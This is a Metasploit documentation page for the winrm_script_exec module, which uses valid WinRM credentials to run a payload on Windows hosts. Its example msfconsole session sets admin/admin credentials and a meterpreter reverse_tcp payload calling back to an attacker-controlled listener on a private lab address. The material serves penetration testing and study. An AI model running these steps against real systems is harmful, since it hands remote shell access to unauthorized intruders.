adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
5ab0129f0f4dfd12b4b7b5357e9ed2fa7d1cfaa1
metasploit-gs/documentation/modules/exploit/winrm/winrm_script_exec.md
T
itsmeroy2012 5ab0129f0f Documentation on winrm_script_exec
2017-03-19 18:27:00 +05:30

3.2 KiB
Raw Blame History

Vulnerable Application

Windows Remote Management (WinRM) is a feature of Windows Vista that allows administrators to remotely run management scripts. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol). This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy. IMPORTANT: If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. [EXPLOIT DB:] https://www.exploit-db.com/exploits/22526/

Example Usage

msf exploit(handler) > use exploit/windows/winrm/winrm_script_exec
msf exploit(winrm_script_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(winrm_script_exec) > set USERNAME admin
USERNAME => admin
msf exploit(winrm_script_exec) > set PASSWORD admin
PASSWORD => admin
msf exploit(winrm_script_exec) > set LHOST 192.168.198.138
LHOST => 192.168.198.138
msf exploit(winrm_script_exec) > set LPORT 4444
LPORT => 4444
msf exploit(winrm_script_exec) > set RHOST 192.168.198.130
RHOST => 192.168.198.130
msf exploit(winrm_script_exec) > show options

Module options (exploit/windows/winrm/winrm_script_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN     WORKSTATION      yes       The domain to use for Windows authentification
   FORCE_VBS  false            yes       Force the module to use the VBS CmdStager
   PASSWORD   admin            yes       A specific password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.198.130  yes       The target address
   RPORT      5985             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URI        /wsman           yes       The URI of the WinRM service
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            yes       A specific username to authenticate as
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.198.138  yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



msf exploit(winrm_script_exec) > run
[*] Started reverse TCP handler on 192.168.198.138:4444
Reference in New Issue View Git Blame Copy Permalink